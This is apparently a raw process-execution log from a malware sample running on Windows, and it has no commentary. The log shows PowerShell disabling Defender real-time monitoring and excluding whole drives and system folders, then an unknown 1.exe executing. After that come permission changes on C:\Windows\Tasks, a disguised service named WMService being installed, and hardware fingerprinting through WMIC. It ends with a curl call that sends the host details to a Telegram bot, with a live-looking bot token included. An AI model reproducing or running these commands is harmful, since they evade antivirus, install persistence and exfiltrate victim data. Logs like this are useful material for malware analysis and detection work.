powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
2060 powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration , c:\users\kbtgt\desktop , C:\Windows\tasks , C:\Windows , C:\Windows\Logs , C:\Windows\SysWOW64 , C:\Windows\System32\WindowsPowerShell\v1.0 , C:\ProgramData , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , powershell.exe , c:\
2232 1.exe "C:\programdata\1.exe" /D
2376 chcp.com chcp 65001
2600 powershell.exe powershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\
2672 tasklist.exe tasklist /FI "IMAGENAME eq Superfetch.exe"
2768 find.exe find /I /N "Superfetch.exe"
2804 takeown.exe takeown /f c:\windows\tasks
2952 timeout.exe TIMEOUT /T 3 /NOBREAK
2996 icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "*S-1-1-0:(R,REA,RA,RD)" "*S-1-5-7:(R,REA,RA,RD)"
2236 icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "SYSTEM:(R,REA,RA,RD)"
2436 icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Administrators:(R,REA,RA,RD)"
2512 icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "Users:(R,REA,RA,RD)"
2484 icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "test22:(R,REA,RA,RD)"
2620 icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "test22:(R,REA,RA,RD)"
2696 icacls.exe icacls "C:\Windows\Tasks" /inheritance:e /grant "EVERYONE:(R,REA,RA,RD)"
2720 timeout.exe TIMEOUT /T 3 /NOBREAK
2828 timeout.exe TIMEOUT /T 1 /NOBREAK
2280 Wmiic.exe "C:\windows\tasks\wmiic.exe" install WMService IntelConfigService.exe
2900 timeout.exe TIMEOUT /T 1 /NOBREAK
2764 Wmiic.exe "C:\windows\tasks\wmiic" start WMService
2852 timeout.exe TIMEOUT /T 2 /NOBREAK
2340 net1.exe C:\Windows\system32\net1 start WMService
2568 WMIC.exe WMIC CPU Get Name /Value
2532 findstr.exe FindStr .
2616 cmd.exe C:\Windows\system32\cmd.exe /c WMIC /Node:localhost Path Win32_VideoController Get Name /Value| FIND.EXE "="
2740 tasklist.exe tasklist /FI "IMAGENAME eq Superfetch.exe"
2784 find.exe find /I /N "Superfetch.exe"
1676 curl.exe c:\programdata\curl.exe --insecure --data chat_id="552691400" --data parse-mode=markdown --data-urlencode text="TEST22-PCCORE2Intel(R) Core(TM) i5-8400 CPU @ 2.80GHzIntel(R) Core(TM) i5-8400 CPU @ 2.80GHzSERVICE WMService NOT RUN" "https://api.telegram.org/bot"5086556714:AAF7DbEW7CWKb1GEIy6_inxVlrGJ39JUUBM"/sendMessage"
2104